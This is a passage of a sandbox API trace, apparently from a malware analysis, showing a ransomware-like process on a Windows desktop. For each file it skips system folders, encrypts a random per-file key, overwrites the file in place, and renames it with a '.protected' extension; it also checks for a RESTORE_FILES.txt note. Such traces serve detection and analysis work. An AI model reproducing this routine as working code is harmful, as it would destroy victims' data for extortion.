halpmcxz\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.258] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 53 [0091.258] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0091.258] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 53 [0091.258] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0091.258] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 53 [0091.258] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0091.258] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0091.258] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.259] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0091.259] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.259] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.259] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.259] CloseHandle (hObject=0xb4) returned 1 [0091.259] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.protected") returned 63 [0091.259] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini.protected")) returned 1 [0091.260] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.260] lstrcmpiW (lpString1="GM EG9P3tcKk_URv7J.odt", lpString2="Windows") returned -1 [0091.260] lstrcmpiW (lpString1="GM EG9P3tcKk_URv7J.odt", lpString2="Program Files") returned -1 [0091.260] lstrcmpiW (lpString1="GM EG9P3tcKk_URv7J.odt", lpString2="Program Files (x86)") returned -1 [0091.260] lstrcmpiW (lpString1="GM EG9P3tcKk_URv7J.odt", lpString2="$Recycle.bin") returned 1 [0091.260] lstrcmpiW (lpString1="GM EG9P3tcKk_URv7J.odt", lpString2="System Volume Information") returned -1 [0091.260] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt") returned 64 [0091.260] StrStrIW (lpFirst="GM EG9P3tcKk_URv7J.odt", lpSrch=".protected") returned 0x0 [0091.260] lstrcmpW (lpString1="GM EG9P3tcKk_URv7J.odt", lpString2="RESTORE_FILES.txt") returned -1 [0091.260] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.260] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gm eg9p3tckk_urv7j.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt") returned 64 [0091.261] StrStrW (lpFirst="GM EG9P3tcKk_URv7J.odt", lpSrch=".txt") returned 0x0 [0091.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt") returned 64 [0091.261] StrStrW (lpFirst="GM EG9P3tcKk_URv7J.odt", lpSrch=".rar") returned 0x0 [0091.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt") returned 64 [0091.261] StrStrW (lpFirst="GM EG9P3tcKk_URv7J.odt", lpSrch=".zip") returned 0x0 [0091.261] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0xb0c, lpOverlapped=0x0) returned 1 [0091.262] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff4f4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.262] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xb0c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0xb0c, lpOverlapped=0x0) returned 1 [0091.262] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.262] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.262] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.262] CloseHandle (hObject=0xb4) returned 1 [0091.262] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt.protected") returned 74 [0091.262] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gm eg9p3tckk_urv7j.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\GM EG9P3tcKk_URv7J.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gm eg9p3tckk_urv7j.odt.protected")) returned 1 [0091.263] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.263] lstrcmpiW (lpString1="heuSjJUSuI3hf.mp4", lpString2="Windows") returned -1 [0091.263] lstrcmpiW (lpString1="heuSjJUSuI3hf.mp4", lpString2="Program Files") returned -1 [0091.263] lstrcmpiW (lpString1="heuSjJUSuI3hf.mp4", lpString2="Program Files (x86)") returned -1 [0091.263] lstrcmpiW (lpString1="heuSjJUSuI3hf.mp4", lpString2="$Recycle.bin") returned 1 [0091.263] lstrcmpiW (lpString1="heuSjJUSuI3hf.mp4", lpString2="System Volume Information") returned -1 [0091.263] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4") returned 59 [0091.263] StrStrIW (lpFirst="heuSjJUSuI3hf.mp4", lpSrch=".protected") returned 0x0 [0091.263] lstrcmpW (lpString1="heuSjJUSuI3hf.mp4", lpString2="RESTORE_FILES.txt") returned -1 [0091.263] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.263] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.263] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\heusjjusui3hf.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.264] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4") returned 59 [0091.264] StrStrW (lpFirst="heuSjJUSuI3hf.mp4", lpSrch=".txt") returned 0x0 [0091.264] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4") returned 59 [0091.264] StrStrW (lpFirst="heuSjJUSuI3hf.mp4", lpSrch=".rar") returned 0x0 [0091.264] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4") returned 59 [0091.264] StrStrW (lpFirst="heuSjJUSuI3hf.mp4", lpSrch=".zip") returned 0x0 [0091.264] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.264] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.265] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.265] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.265] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.265] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.265] CloseHandle (hObject=0xb4) returned 1 [0091.265] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4.protected") returned 69 [0091.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\heusjjusui3hf.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\heuSjJUSuI3hf.mp4.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\heusjjusui3hf.mp4.protected")) returned 1 [0091.266] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.266] lstrcmpiW (lpString1="jw19-k.wav", lpString2="Windows") returned -1 [0091.266] lstrcmpiW (lpString1="jw19-k.wav", lpString2="Program Files") returned -1 [0091.266] lstrcmpiW (lpString1="jw19-k.wav", lpString2="Program Files (x86)") returned -1 [0091.266] lstrcmpiW (lpString1="jw19-k.wav", lpString2="$Recycle.bin") returned 1 [0091.266] lstrcmpiW (lpString1="jw19-k.wav", lpString2="System Volume Information") returned -1 [0091.266] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav") returned 52 [0091.266] StrStrIW (lpFirst="jw19-k.wav", lpSrch=".protected") returned 0x0 [0091.266] lstrcmpW (lpString1="jw19-k.wav", lpString2="RESTORE_FILES.txt") returned -1 [0091.266] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.266] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jw19-k.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.267] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav") returned 52 [0091.267] StrStrW (lpFirst="jw19-k.wav", lpSrch=".txt") returned 0x0 [0091.267] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav") returned 52 [0091.267] StrStrW (lpFirst="jw19-k.wav", lpSrch=".rar") returned 0x0 [0091.267] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav") returned 52 [0091.267] StrStrW (lpFirst="jw19-k.wav", lpSrch=".zip") returned 0x0 [0091.267] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.267] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.267] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.268] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.268] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.268] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.268] CloseHandle (hObject=0xb4) returned 1 [0091.268] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav.protected") returned 62 [0091.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jw19-k.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jw19-k.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jw19-k.wav.protected")) returned 1 [0091.269] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.270] lstrcmpiW (lpString1="L2FstIl.mkv", lpString2="Windows") returned -1 [0091.270] lstrcmpiW (lpString1="L2FstIl.mkv", lpString2="Program Files") returned -1 [0091.270] lstrcmpiW (lpString1="L2FstIl.mkv", lpString2="Program Files (x86)") returned -1 [0091.270] lstrcmpiW (lpString1="L2FstIl.mkv", lpString2="$Recycle.bin") returned 1 [0091.270] lstrcmpiW (lpString1="L2FstIl.mkv", lpString2="System Volume Information") returned -1 [0091.270] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv") returned 53 [0091.270] StrStrIW (lpFirst="L2FstIl.mkv", lpSrch=".protected") returned 0x0 [0091.270] lstrcmpW (lpString1="L2FstIl.mkv", lpString2="RESTORE_FILES.txt") returned -1 [0091.270] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.270] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l2fstil.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv") returned 53 [0091.270] StrStrW (lpFirst="L2FstIl.mkv", lpSrch=".txt") returned 0x0 [0091.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv") returned 53 [0091.270] StrStrW (lpFirst="L2FstIl.mkv", lpSrch=".rar") returned 0x0 [0091.270] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv") returned 53 [0091.270] StrStrW (lpFirst="L2FstIl.mkv", lpSrch=".zip") returned 0x0 [0091.270] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.271] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.271] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.271] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.271] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.271] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.271] CloseHandle (hObject=0xb4) returned 1 [0091.272] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv.protected") returned 63 [0091.272] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l2fstil.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\L2FstIl.mkv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\l2fstil.mkv.protected")) returned 1 [0091.273] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.273] lstrcmpiW (lpString1="lUXppUcJoNKpaU.mp3", lpString2="Windows") returned -1 [0091.273] lstrcmpiW (lpString1="lUXppUcJoNKpaU.mp3", lpString2="Program Files") returned -1 [0091.273] lstrcmpiW (lpString1="lUXppUcJoNKpaU.mp3", lpString2="Program Files (x86)") returned -1 [0091.273] lstrcmpiW (lpString1="lUXppUcJoNKpaU.mp3", lpString2="$Recycle.bin") returned 1 [0091.273] lstrcmpiW (lpString1="lUXppUcJoNKpaU.mp3", lpString2="System Volume Information") returned -1 [0091.273] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3") returned 60 [0091.273] StrStrIW (lpFirst="lUXppUcJoNKpaU.mp3", lpSrch=".protected") returned 0x0 [0091.273] lstrcmpW (lpString1="lUXppUcJoNKpaU.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0091.273] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.273] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\luxppucjonkpau.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3") returned 60 [0091.273] StrStrW (lpFirst="lUXppUcJoNKpaU.mp3", lpSrch=".txt") returned 0x0 [0091.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3") returned 60 [0091.273] StrStrW (lpFirst="lUXppUcJoNKpaU.mp3", lpSrch=".rar") returned 0x0 [0091.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3") returned 60 [0091.273] StrStrW (lpFirst="lUXppUcJoNKpaU.mp3", lpSrch=".zip") returned 0x0 [0091.273] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.274] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.274] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.274] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.274] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.274] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.274] CloseHandle (hObject=0xb4) returned 1 [0091.274] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3.protected") returned 70 [0091.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\luxppucjonkpau.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lUXppUcJoNKpaU.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\luxppucjonkpau.mp3.protected")) returned 1 [0091.275] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.275] lstrcmpiW (lpString1="M MPYvNo.m4a", lpString2="Windows") returned -1 [0091.276] lstrcmpiW (lpString1="M MPYvNo.m4a", lpString2="Program Files") returned -1 [0091.276] lstrcmpiW (lpString1="M MPYvNo.m4a", lpString2="Program Files (x86)") returned -1 [0091.276] lstrcmpiW (lpString1="M MPYvNo.m4a", lpString2="$Recycle.bin") returned 1 [0091.276] lstrcmpiW (lpString1="M MPYvNo.m4a", lpString2="System Volume Information") returned -1 [0091.276] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a") returned 54 [0091.276] StrStrIW (lpFirst="M MPYvNo.m4a", lpSrch=".protected") returned 0x0 [0091.276] lstrcmpW (lpString1="M MPYvNo.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0091.276] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.276] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 